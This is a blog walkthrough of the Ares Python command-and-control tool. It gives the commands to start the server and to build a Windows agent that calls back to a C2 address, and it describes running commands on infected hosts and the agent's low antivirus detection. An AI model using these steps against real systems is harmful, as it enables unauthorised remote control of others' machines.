The high demand of Red Team assessments has increased the interest of security companies and consultants to develop command and control tools with different capabilities. Some of these tools can be used and in official engagements while some others have been developed only for research purposes.

Ares is a command and control tool which is written in Python and it was developed by Kevin Locati. It has a web interface which runs on port 8080 and it is password and passphrase protected. The database must be created in advance of running the server.

./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ares - Server
Ares – Server
Ares - Password Setup
Ares – Password Setup

Once the password is set Ares will ask for a Passphrase to be used.

Ares - Passphrase
Ares – Passphrase

The main interface of Ares contains only three functions:

  1. Agent List
  2. Change Password
  3. Disconnect

The Agent List is the page of where all the infected hosts running the implant will appear.

Ares - Main Interface
Ares – Main Interface

The config.py in the agent folder controls the settings of the agent. Before anything else the SERVER variable must be changed to the IP address that the command and control server is running.

Ares - Agent Configuration
Ares – Agent Configuration

If wine is installed (Ares repository contains wine setup script) then the agent can be built in an executable format by running the following command:

./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Ares - Creating Agent
Ares – Creating Agent

Hosts that are running the agent will appear on the agent list in the following format.

Ares - List of Agents
Ares – List of Agents

Commands can be executed on the target hosts from a field and the output will be retrieved in a console window.

Ares - Command Execution - ipconfig
Ares – Command Execution – ipconfig
Ares - Command Execution - List of Users
Ares – Command Execution – List of Users

Ares except of some basic command execution on the target host doesn’t offer other capabilities. However the agent has at the time being low detection rate against a number of antivirus.

Agent - Detection Rate
Agent – Detection Rate

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s